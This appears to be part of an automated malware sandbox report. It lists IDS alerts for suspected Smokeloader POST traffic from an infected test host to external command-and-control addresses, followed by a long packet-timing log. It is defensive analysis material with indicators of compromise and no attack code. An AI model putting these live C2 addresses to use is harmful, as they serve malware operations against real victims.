                                                            ADVAPI32.dllClearEventLogW
                                                            Language of compilation systemCountry where language is spokenMap
                                                            TurkishTurkey
                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-10-11T06:37:27.331919+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450549116.58.10.6080TCP
                                                            2024-10-11T06:37:28.608795+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450550116.58.10.6080TCP
                                                            2024-10-11T06:37:29.867486+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450551116.58.10.6080TCP
                                                            2024-10-11T06:37:31.120563+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450552116.58.10.6080TCP
                                                            2024-10-11T06:37:32.627921+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450553116.58.10.6080TCP
                                                            2024-10-11T06:37:33.887842+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450554116.58.10.6080TCP
                                                            2024-10-11T06:37:35.170910+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450555116.58.10.6080TCP
                                                            2024-10-11T06:37:36.456953+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450556116.58.10.6080TCP
                                                            2024-10-11T06:37:37.720039+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450557116.58.10.6080TCP
                                                            2024-10-11T06:37:39.029454+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450558116.58.10.6080TCP
                                                            2024-10-11T06:37:40.279368+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450559116.58.10.6080TCP
                                                            2024-10-11T06:37:41.538479+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450560116.58.10.6080TCP
                                                            2024-10-11T06:37:42.807815+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450561116.58.10.6080TCP
                                                            2024-10-11T06:37:44.079413+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450562116.58.10.6080TCP
                                                            2024-10-11T06:37:45.349627+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450563116.58.10.6080TCP
                                                            2024-10-11T06:37:46.644516+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450564116.58.10.6080TCP
                                                            2024-10-11T06:37:47.887306+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450565116.58.10.6080TCP
                                                            2024-10-11T06:37:49.178180+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450566116.58.10.6080TCP
                                                            2024-10-11T06:37:50.445145+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450567116.58.10.6080TCP
                                                            2024-10-11T06:37:51.737702+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450568116.58.10.6080TCP
                                                            2024-10-11T06:37:53.006273+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450569116.58.10.6080TCP
                                                            2024-10-11T06:37:54.248895+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450570116.58.10.6080TCP
                                                            2024-10-11T06:37:55.768968+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450571116.58.10.6080TCP
                                                            2024-10-11T06:37:57.008913+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450573116.58.10.6080TCP
                                                            2024-10-11T06:38:00.041549+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450581116.58.10.6080TCP
                                                            2024-10-11T06:38:01.304385+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450592116.58.10.6080TCP
                                                            2024-10-11T06:38:02.605345+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450598116.58.10.6080TCP
                                                            2024-10-11T06:38:03.860532+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450609116.58.10.6080TCP
                                                            2024-10-11T06:38:05.389156+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450615116.58.10.6080TCP
                                                            2024-10-11T06:38:06.633083+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450626116.58.10.6080TCP
                                                            2024-10-11T06:38:07.949302+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450636116.58.10.6080TCP
                                                            2024-10-11T06:38:09.233415+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450643116.58.10.6080TCP
                                                            2024-10-11T06:38:10.505968+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450654116.58.10.6080TCP
                                                            2024-10-11T06:38:12.057886+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450664116.58.10.6080TCP
                                                            2024-10-11T06:39:21.577978+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450850116.58.10.6080TCP
                                                            2024-10-11T06:39:28.718450+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450851116.58.10.6080TCP
                                                            2024-10-11T06:39:36.316985+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450852116.58.10.6080TCP
                                                            2024-10-11T06:39:44.999341+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450853116.58.10.6080TCP
                                                            2024-10-11T06:39:55.431116+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450854116.58.10.6080TCP
                                                            2024-10-11T06:40:08.776918+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450855186.233.231.4580TCP
                                                            2024-10-11T06:40:21.583692+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450856186.233.231.4580TCP
                                                            2024-10-11T06:40:33.594959+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450857186.233.231.4580TCP
                                                            2024-10-11T06:40:47.322863+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450858186.233.231.4580TCP
                                                            2024-10-11T06:40:59.977004+02002039103ET MALWARE Suspected Smokeloader Activity (POST)1192.168.2.450859186.233.231.4580TCP
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Oct 11, 2024 06:37:26.081717014 CEST5054980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:26.086863041 CEST8050549116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:26.086942911 CEST5054980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:26.087119102 CEST5054980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:26.087151051 CEST5054980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:26.092567921 CEST8050549116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:26.092611074 CEST8050549116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:27.330255032 CEST8050549116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:27.331744909 CEST8050549116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:27.331918955 CEST5054980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:27.332235098 CEST5054980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:27.334234953 CEST5055080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:27.337049961 CEST8050549116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:27.339276075 CEST8050550116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:27.339363098 CEST5055080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:27.339456081 CEST5055080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:27.339489937 CEST5055080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:27.344615936 CEST8050550116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:27.344657898 CEST8050550116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:28.608561039 CEST8050550116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:28.608612061 CEST8050550116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:28.608794928 CEST5055080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:28.608794928 CEST5055080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:28.612421989 CEST5055180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:28.613822937 CEST8050550116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:28.617471933 CEST8050551116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:28.617573023 CEST5055180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:28.617679119 CEST5055180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:28.617714882 CEST5055180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:28.622570992 CEST8050551116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:28.622927904 CEST8050551116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:29.865607023 CEST8050551116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:29.867275000 CEST8050551116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:29.867486000 CEST5055180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:29.867486000 CEST5055180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:29.870002031 CEST5055280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:29.872828960 CEST8050551116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:29.875000000 CEST8050552116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:29.875077009 CEST5055280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:29.875168085 CEST5055280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:29.875199080 CEST5055280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:29.880547047 CEST8050552116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:29.880640984 CEST8050552116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:31.120218039 CEST8050552116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:31.120273113 CEST8050552116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:31.120563030 CEST5055280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:31.120563030 CEST5055280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:31.123079062 CEST5055380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:31.125916004 CEST8050552116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:31.128498077 CEST8050553116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:31.128591061 CEST5055380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:31.128701925 CEST5055380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:31.128739119 CEST5055380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:31.134287119 CEST8050553116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:31.134329081 CEST8050553116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:32.624485970 CEST8050553116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:32.627692938 CEST8050553116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:32.627921104 CEST5055380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:32.627921104 CEST5055380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:32.630134106 CEST5055480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:32.633426905 CEST8050553116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:32.636445999 CEST8050554116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:32.636529922 CEST5055480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:32.636657000 CEST5055480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:32.636657000 CEST5055480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:32.641808033 CEST8050554116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:32.642153025 CEST8050554116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:33.887737036 CEST8050554116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:33.887782097 CEST8050554116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:33.887841940 CEST5055480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:33.887970924 CEST5055480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:33.890561104 CEST5055580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:33.893017054 CEST8050554116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:33.895683050 CEST8050555116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:33.895770073 CEST5055580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:33.895883083 CEST5055580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:33.895915985 CEST5055580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:33.901082039 CEST8050555116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:33.901114941 CEST8050555116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:35.170355082 CEST8050555116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:35.170711994 CEST8050555116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:35.170909882 CEST5055580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:35.170909882 CEST5055580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:35.173182011 CEST5055680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:35.176320076 CEST8050555116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:35.178235054 CEST8050556116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:35.178427935 CEST5055680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:35.178427935 CEST5055680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:35.178427935 CEST5055680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:35.183593035 CEST8050556116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:35.183624029 CEST8050556116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:36.455070019 CEST8050556116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:36.456767082 CEST8050556116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:36.456953049 CEST5055680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:36.460535049 CEST5055680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:36.463156939 CEST5055780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:36.465570927 CEST8050556116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:36.468832970 CEST8050557116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:36.468909979 CEST5055780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:36.468993902 CEST5055780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:36.469016075 CEST5055780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:36.474083900 CEST8050557116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:36.474229097 CEST8050557116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:37.717370033 CEST8050557116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:37.719969988 CEST8050557116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:37.720038891 CEST5055780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:37.720118046 CEST5055780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:37.723428965 CEST5055880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:37.728812933 CEST8050557116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:37.729955912 CEST8050558116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:37.730027914 CEST5055880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:37.730607986 CEST5055880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:37.730640888 CEST5055880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:37.739473104 CEST8050558116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:37.739502907 CEST8050558116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:39.029239893 CEST8050558116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:39.029393911 CEST8050558116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:39.029453993 CEST5055880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:39.029516935 CEST5055880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:39.031717062 CEST5055980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:39.034579992 CEST8050558116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:39.037427902 CEST8050559116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:39.037514925 CEST5055980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:39.037609100 CEST5055980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:39.037609100 CEST5055980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:39.043533087 CEST8050559116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:39.044944048 CEST8050559116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:40.278882980 CEST8050559116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:40.279181004 CEST8050559116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:40.279367924 CEST5055980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:40.279367924 CEST5055980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:40.281594992 CEST5056080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:40.284651041 CEST8050559116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:40.286571980 CEST8050560116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:40.286645889 CEST5056080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:40.286746979 CEST5056080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:40.286782026 CEST5056080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:40.291980982 CEST8050560116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:40.292011023 CEST8050560116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:41.537832975 CEST8050560116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:41.538381100 CEST8050560116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:41.538479090 CEST5056080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:41.538564920 CEST5056080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:41.541181087 CEST5056180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:41.543693066 CEST8050560116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:41.546444893 CEST8050561116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:41.546533108 CEST5056180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:41.546612978 CEST5056180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:41.546637058 CEST5056180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:41.552011967 CEST8050561116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:41.552047968 CEST8050561116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:42.807575941 CEST8050561116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:42.807631016 CEST8050561116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:42.807815075 CEST5056180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:42.807815075 CEST5056180192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:42.809907913 CEST5056280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:42.813254118 CEST8050561116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:42.815563917 CEST8050562116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:42.815745115 CEST5056280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:42.815881014 CEST5056280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:42.815903902 CEST5056280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:42.821078062 CEST8050562116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:42.821141958 CEST8050562116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:44.078490973 CEST8050562116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:44.079078913 CEST8050562116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:44.079412937 CEST5056280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:44.079412937 CEST5056280192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:44.081552982 CEST5056380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:44.084666967 CEST8050562116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:44.086780071 CEST8050563116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:44.086987019 CEST5056380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:44.086987019 CEST5056380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:44.087074041 CEST5056380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:44.092348099 CEST8050563116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:44.092389107 CEST8050563116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:45.348758936 CEST8050563116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:45.349478960 CEST8050563116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:45.349627018 CEST5056380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:45.353554964 CEST5056380192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:45.355993986 CEST5056480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:45.358673096 CEST8050563116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:45.361705065 CEST8050564116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:45.361788034 CEST5056480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:45.361881971 CEST5056480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:45.361901045 CEST5056480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:45.367893934 CEST8050564116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:45.367937088 CEST8050564116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:46.644383907 CEST8050564116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:46.644439936 CEST8050564116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:46.644515991 CEST5056480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:46.644812107 CEST5056480192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:46.646644115 CEST5056580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:46.649986982 CEST8050564116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:46.651658058 CEST8050565116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:46.651727915 CEST5056580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:46.651829004 CEST5056580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:46.651843071 CEST5056580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:46.657130957 CEST8050565116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:46.657162905 CEST8050565116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:47.887083054 CEST8050565116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:47.887192011 CEST8050565116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:47.887305975 CEST5056580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:47.887305975 CEST5056580192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:47.890137911 CEST5056680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:47.892239094 CEST8050565116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:47.895216942 CEST8050566116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:47.895406008 CEST5056680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:47.895406008 CEST5056680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:47.895428896 CEST5056680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:47.900620937 CEST8050566116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:47.900661945 CEST8050566116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:49.175060987 CEST8050566116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:49.178014994 CEST8050566116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:49.178179979 CEST5056680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:49.178179979 CEST5056680192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:49.180373907 CEST5056780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:49.183901072 CEST8050566116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:49.185405970 CEST8050567116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:49.185585976 CEST5056780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:49.185616016 CEST5056780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:49.185630083 CEST5056780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:49.190996885 CEST8050567116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:49.191082954 CEST8050567116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:50.444509983 CEST8050567116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:50.445071936 CEST8050567116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:50.445144892 CEST5056780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:50.445283890 CEST5056780192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:50.450328112 CEST8050567116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:50.452339888 CEST5056880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:50.457427979 CEST8050568116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:50.457551956 CEST5056880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:50.457628965 CEST5056880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:50.457668066 CEST5056880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:50.462704897 CEST8050568116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:50.462735891 CEST8050568116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:51.736558914 CEST8050568116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:51.737611055 CEST8050568116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:51.737701893 CEST5056880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:51.737759113 CEST5056880192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:51.740052938 CEST5056980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:51.742892981 CEST8050568116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:51.745299101 CEST8050569116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:51.745408058 CEST5056980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:51.745544910 CEST5056980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:51.745570898 CEST5056980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:51.751040936 CEST8050569116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:51.751076937 CEST8050569116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:53.006021023 CEST8050569116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:53.006064892 CEST8050569116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:53.006273031 CEST5056980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:53.006273985 CEST5056980192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:53.008461952 CEST5057080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:53.013237000 CEST8050569116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:53.014559984 CEST8050570116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:53.014760971 CEST5057080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:53.014760971 CEST5057080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:53.014760971 CEST5057080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:53.020190001 CEST8050570116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:53.020231009 CEST8050570116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:54.248764038 CEST8050570116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:54.248809099 CEST8050570116.58.10.60192.168.2.4
                                                            Oct 11, 2024 06:37:54.248894930 CEST5057080192.168.2.4116.58.10.60
                                                            Oct 11, 2024 06:37:54.249042988 CEST5057080192.168.2.4116.58.10.60
